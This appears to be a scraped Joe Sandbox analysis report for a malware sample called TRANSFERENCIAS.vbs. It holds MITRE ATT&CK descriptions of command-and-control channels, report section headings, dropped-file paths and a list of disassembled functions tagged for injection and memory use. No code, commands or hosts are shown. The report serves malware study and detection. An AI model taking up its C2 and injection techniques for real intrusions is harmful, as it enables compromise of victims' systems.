Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TRANSFERENCIAS.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\temp_executable.exe.log

C:\Users\user\AppData\Local\Temp\temp_executable.exe

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Windows Analysis Report
TRANSFERENCIAS.vbs

Function 02FA3558 Relevance: 1.9, Strings: 1, Instructions: 615
COMMON

Function 02FA41AC Relevance: 1.8, APIs: 1, Instructions: 274
processCOMMON

Function 02FA2D14 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 02FA2DA0 Relevance: 1.7, APIs: 1, Instructions: 242
COMMON

Function 02FA47F8 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Function 02FA2D5C Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Function 02FA4670 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 02FA2D38 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 02FA45A8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 02FA2D68 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 02FA2D20 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 02FA2D50 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 00417663 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 0042C563 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Function 02CC35C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 02CC2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 02CC2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 0042C8D3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 0042C883 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 0042C923 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON